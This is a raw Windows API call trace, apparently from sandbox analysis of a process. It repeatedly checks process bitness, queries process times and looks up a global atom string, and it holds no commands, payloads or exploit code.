	[0130.437] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.437] CloseHandle (hObject=0x2dc) returned 1
	[0130.437] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.437] CloseHandle (hObject=0x2dc) returned 1
	[0130.438] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.438] CloseHandle (hObject=0x2dc) returned 1
	[0130.438] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.438] CloseHandle (hObject=0x2dc) returned 1
	[0130.438] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.438] CloseHandle (hObject=0x2dc) returned 1
	[0130.438] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.438] CloseHandle (hObject=0x2dc) returned 1
	[0130.438] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.438] CloseHandle (hObject=0x2dc) returned 1
	[0130.439] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.439] CloseHandle (hObject=0x2dc) returned 1
	[0130.439] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.439] CloseHandle (hObject=0x2dc) returned 1
	[0130.439] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.439] CloseHandle (hObject=0x2dc) returned 1
	[0130.439] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.439] CloseHandle (hObject=0x2dc) returned 1
	[0130.440] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.440] CloseHandle (hObject=0x2dc) returned 1
	[0130.440] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.440] CloseHandle (hObject=0x2dc) returned 1
	[0130.440] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.440] CloseHandle (hObject=0x2dc) returned 1
	[0130.441] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.441] CloseHandle (hObject=0x2dc) returned 1
	[0130.441] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.441] CloseHandle (hObject=0x2dc) returned 1
	[0130.441] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.441] CloseHandle (hObject=0x2dc) returned 1
	[0130.441] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.441] CloseHandle (hObject=0x2dc) returned 1
	[0130.441] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.442] CloseHandle (hObject=0x2dc) returned 1
	[0130.442] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.442] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.442] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.443] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.443] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.443] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.443] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.443] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.443] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.443] CloseHandle (hObject=0x2dc) returned 1
	[0130.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.444] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.444] CloseHandle (hObject=0x2dc) returned 1
	[0130.444] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.444] CloseHandle (hObject=0x2dc) returned 1
	[0130.444] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.444] CloseHandle (hObject=0x2dc) returned 1
	[0130.444] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.445] CloseHandle (hObject=0x2dc) returned 1
	[0130.445] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.445] CloseHandle (hObject=0x2dc) returned 1
	[0130.478] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.478] CloseHandle (hObject=0x2dc) returned 1
	[0130.478] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.478] CloseHandle (hObject=0x2dc) returned 1
	[0130.478] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.478] CloseHandle (hObject=0x2dc) returned 1
	[0130.478] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.478] CloseHandle (hObject=0x2dc) returned 1
	[0130.479] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.479] CloseHandle (hObject=0x2dc) returned 1
	[0130.479] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.479] CloseHandle (hObject=0x2dc) returned 1
	[0130.479] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.479] CloseHandle (hObject=0x2dc) returned 1
	[0130.479] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.479] CloseHandle (hObject=0x2dc) returned 1
	[0130.479] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.480] CloseHandle (hObject=0x2dc) returned 1
	[0130.480] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.480] CloseHandle (hObject=0x2dc) returned 1
	[0130.480] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.480] CloseHandle (hObject=0x2dc) returned 1
	[0130.480] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.480] CloseHandle (hObject=0x2dc) returned 1
	[0130.480] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.480] CloseHandle (hObject=0x2dc) returned 1
	[0130.481] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.481] CloseHandle (hObject=0x2dc) returned 1
	[0130.481] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.481] CloseHandle (hObject=0x2dc) returned 1
	[0130.481] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.481] CloseHandle (hObject=0x2dc) returned 1
	[0130.481] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.481] CloseHandle (hObject=0x2dc) returned 1
	[0130.482] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.482] CloseHandle (hObject=0x2dc) returned 1
	[0130.482] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.482] CloseHandle (hObject=0x2dc) returned 1
	[0130.482] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.482] CloseHandle (hObject=0x2dc) returned 1
	[0130.482] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.482] CloseHandle (hObject=0x2dc) returned 1
	[0130.483] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.483] CloseHandle (hObject=0x2dc) returned 1
	[0130.483] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.483] CloseHandle (hObject=0x2dc) returned 1
	[0130.483] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.483] CloseHandle (hObject=0x2dc) returned 1
	[0130.483] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.483] CloseHandle (hObject=0x2dc) returned 1
	[0130.483] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.484] CloseHandle (hObject=0x2dc) returned 1
	[0130.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.484] CloseHandle (hObject=0x2dc) returned 1
	[0130.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.484] CloseHandle (hObject=0x2dc) returned 1
	[0130.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.484] CloseHandle (hObject=0x2dc) returned 1
	[0130.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.485] CloseHandle (hObject=0x2dc) returned 1
	[0130.485] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.485] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.485] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.486] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.486] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.486] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.486] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.486] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.486] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.486] CloseHandle (hObject=0x2dc) returned 1
	[0130.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.487] CloseHandle (hObject=0x2dc) returned 1
	[0130.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.487] CloseHandle (hObject=0x2dc) returned 1
	[0130.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.487] CloseHandle (hObject=0x2dc) returned 1
	[0130.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.487] CloseHandle (hObject=0x2dc) returned 1
	[0130.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.488] CloseHandle (hObject=0x2dc) returned 1
	[0130.521] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.521] CloseHandle (hObject=0x2dc) returned 1
	[0130.521] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.521] CloseHandle (hObject=0x2dc) returned 1
	[0130.521] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.521] CloseHandle (hObject=0x2dc) returned 1
	[0130.522] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.522] CloseHandle (hObject=0x2dc) returned 1
	[0130.522] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.522] CloseHandle (hObject=0x2dc) returned 1
	[0130.522] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.522] CloseHandle (hObject=0x2dc) returned 1
	[0130.522] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.522] CloseHandle (hObject=0x2dc) returned 1
	[0130.523] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.523] CloseHandle (hObject=0x2dc) returned 1
	[0130.523] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.523] CloseHandle (hObject=0x2dc) returned 1
	[0130.523] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.523] CloseHandle (hObject=0x2dc) returned 1
	[0130.523] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.523] CloseHandle (hObject=0x2dc) returned 1
	[0130.524] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.524] CloseHandle (hObject=0x2dc) returned 1
	[0130.524] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.524] CloseHandle (hObject=0x2dc) returned 1
	[0130.524] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.524] CloseHandle (hObject=0x2dc) returned 1
	[0130.524] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.524] CloseHandle (hObject=0x2dc) returned 1
	[0130.525] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.525] CloseHandle (hObject=0x2dc) returned 1
	[0130.525] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.525] CloseHandle (hObject=0x2dc) returned 1
	[0130.525] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.525] CloseHandle (hObject=0x2dc) returned 1
	[0130.525] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.525] CloseHandle (hObject=0x2dc) returned 1
	[0130.526] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.526] CloseHandle (hObject=0x2dc) returned 1
	[0130.526] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.526] CloseHandle (hObject=0x2dc) returned 1
	[0130.526] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.526] CloseHandle (hObject=0x2dc) returned 1
	[0130.526] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.526] CloseHandle (hObject=0x2dc) returned 1
	[0130.527] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.527] CloseHandle (hObject=0x2dc) returned 1
	[0130.527] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.527] CloseHandle (hObject=0x2dc) returned 1
	[0130.527] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.527] CloseHandle (hObject=0x2dc) returned 1
	[0130.527] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.527] CloseHandle (hObject=0x2dc) returned 1
	[0130.527] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.527] CloseHandle (hObject=0x2dc) returned 1
	[0130.528] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.528] CloseHandle (hObject=0x2dc) returned 1
	[0130.528] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.528] CloseHandle (hObject=0x2dc) returned 1
	[0130.528] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.529] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.529] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.529] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.529] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.529] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.530] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.530] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.530] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.530] CloseHandle (hObject=0x2dc) returned 1
	[0130.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.530] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.530] CloseHandle (hObject=0x2dc) returned 1
	[0130.530] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.530] CloseHandle (hObject=0x2dc) returned 1
	[0130.531] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.531] CloseHandle (hObject=0x2dc) returned 1
	[0130.531] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.531] CloseHandle (hObject=0x2dc) returned 1
	[0130.531] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.531] CloseHandle (hObject=0x2dc) returned 1
	[0130.564] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.564] CloseHandle (hObject=0x2dc) returned 1
	[0130.565] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.565] CloseHandle (hObject=0x2dc) returned 1
	[0130.565] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.565] CloseHandle (hObject=0x2dc) returned 1
	[0130.565] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.565] CloseHandle (hObject=0x2dc) returned 1
	[0130.565] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.565] CloseHandle (hObject=0x2dc) returned 1
	[0130.566] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.566] CloseHandle (hObject=0x2dc) returned 1
	[0130.566] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.566] CloseHandle (hObject=0x2dc) returned 1
	[0130.566] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.566] CloseHandle (hObject=0x2dc) returned 1
	[0130.566] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.566] CloseHandle (hObject=0x2dc) returned 1
	[0130.566] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.567] CloseHandle (hObject=0x2dc) returned 1
	[0130.567] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.567] CloseHandle (hObject=0x2dc) returned 1
	[0130.567] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.567] CloseHandle (hObject=0x2dc) returned 1
	[0130.567] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.567] CloseHandle (hObject=0x2dc) returned 1
	[0130.567] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.567] CloseHandle (hObject=0x2dc) returned 1
	[0130.568] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.568] CloseHandle (hObject=0x2dc) returned 1
	[0130.568] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.568] CloseHandle (hObject=0x2dc) returned 1
	[0130.568] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.568] CloseHandle (hObject=0x2dc) returned 1
	[0130.568] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.568] CloseHandle (hObject=0x2dc) returned 1
	[0130.569] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.569] CloseHandle (hObject=0x2dc) returned 1
	[0130.569] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.569] CloseHandle (hObject=0x2dc) returned 1
	[0130.569] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.569] CloseHandle (hObject=0x2dc) returned 1
	[0130.569] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.569] CloseHandle (hObject=0x2dc) returned 1
	[0130.570] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.570] CloseHandle (hObject=0x2dc) returned 1
	[0130.570] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.570] CloseHandle (hObject=0x2dc) returned 1
	[0130.570] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.570] CloseHandle (hObject=0x2dc) returned 1
	[0130.570] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.570] CloseHandle (hObject=0x2dc) returned 1
	[0130.570] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.570] CloseHandle (hObject=0x2dc) returned 1
	[0130.571] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.571] CloseHandle (hObject=0x2dc) returned 1
	[0130.571] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.571] CloseHandle (hObject=0x2dc) returned 1
	[0130.571] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.571] CloseHandle (hObject=0x2dc) returned 1
	[0130.572] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.572] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.572] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.572] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.573] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.573] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.573] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.573] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.573] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.573] CloseHandle (hObject=0x2dc) returned 1
	[0130.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.573] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.573] CloseHandle (hObject=0x2dc) returned 1
	[0130.574] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.574] CloseHandle (hObject=0x2dc) returned 1
	[0130.574] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.574] CloseHandle (hObject=0x2dc) returned 1
	[0130.574] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.574] CloseHandle (hObject=0x2dc) returned 1
	[0130.574] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.574] CloseHandle (hObject=0x2dc) returned 1
	[0130.607] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.607] CloseHandle (hObject=0x2dc) returned 1
	[0130.608] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.608] CloseHandle (hObject=0x2dc) returned 1
	[0130.608] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.608] CloseHandle (hObject=0x2dc) returned 1
	[0130.608] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.608] CloseHandle (hObject=0x2dc) returned 1
	[0130.608] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.608] CloseHandle (hObject=0x2dc) returned 1
	[0130.608] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.609] CloseHandle (hObject=0x2dc) returned 1
